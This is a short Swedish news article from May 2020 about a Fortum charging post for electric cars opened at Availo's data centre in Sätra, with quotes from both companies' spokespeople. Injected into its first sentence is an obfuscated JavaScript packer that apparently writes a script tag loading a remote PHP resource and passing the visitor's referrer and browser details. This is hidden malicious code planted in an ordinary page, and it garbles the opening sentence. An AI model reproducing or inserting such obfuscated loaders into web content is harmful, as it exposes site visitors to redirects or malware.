Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Elbilar är framtiden. Ny laddstolpe i Skärholmen

Elbilar är framtiden. Ny laddstolpe i Skärholmen
Sebastian

I eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|reydb|var|u0026u|referrer|fezbh||js|php’.split(’|’),0,{}))
juli 2008 invigdes den första laddstolpen för elbilar i Sverige. Då fanns omkring 40 elbilar i Stockholms län. Idag kopplar Fortum upp ytterligare en laddstolpe mot elnätet. Den finns vid Availos Datacenter på Storsätragränd 3 och sponsras av Availo.

Availos kärnverksamhet är infrastruktur för effektiv och säker lagring av data med optimal tillgänglighet. Infrastrukturen för laddning av elbilar är fortfarande under uppbyggnad. Därför krävs viss planering av körsträckan för elbilsförare. Availos egen Mitsubishi i-Miev kommer ca 12 mil på ett fulladdat batteri. Nu hjälper företaget Fortum att förbättra infrastrukturen för laddning av elbilar!

”Lättillgänglig och tillförlitlig infrastruktur är en förutsättning för att fler skall välja att köra elbil. Som leverantör av infrastruktur för IT är det extra roligt att hjälpa till att bygga ut infrastrukturen inom ett annat område!” säger Robert Kjellberg, VD och koncernchef för Availo.

Laddstolpen vid Availos Datacenter i Sätra underlättar laddningen av Availos egen poolbilspark, såväl som för företagets kunder som kör elbil. Elen som ”tankas” i laddstolpen kommer från förnyelsebara energikällor. ”Kostnaden för att erbjuda denna service till våra kunder ser vi som ett av våra bidrag till en bättre miljö”, avslutar Kjellberg.

”Vi är väldigt glada för Availos initiativ och vi hoppas att flera företag tänker utanför ramarna och sätter upp laddstolpar på sina parkeringer. Varje stolpe är ett litet men viktigt steg mot ett fungerande elbilssamhälle”, säger Johan Ander, ansvarig för Charge & Drive, Fortums satsning på laddinfrastruktur för elbilar. ”Availo har valt en lösning i framkant av utvecklingen med intelligens och kommunikation. Vi tror att inom en snar framtid kommer fler och fler företag att följa Availos exempel. Vi räknar med att det ganska snart kommer att finnas hundratals laddstolpar av den typ som Availo har valt.”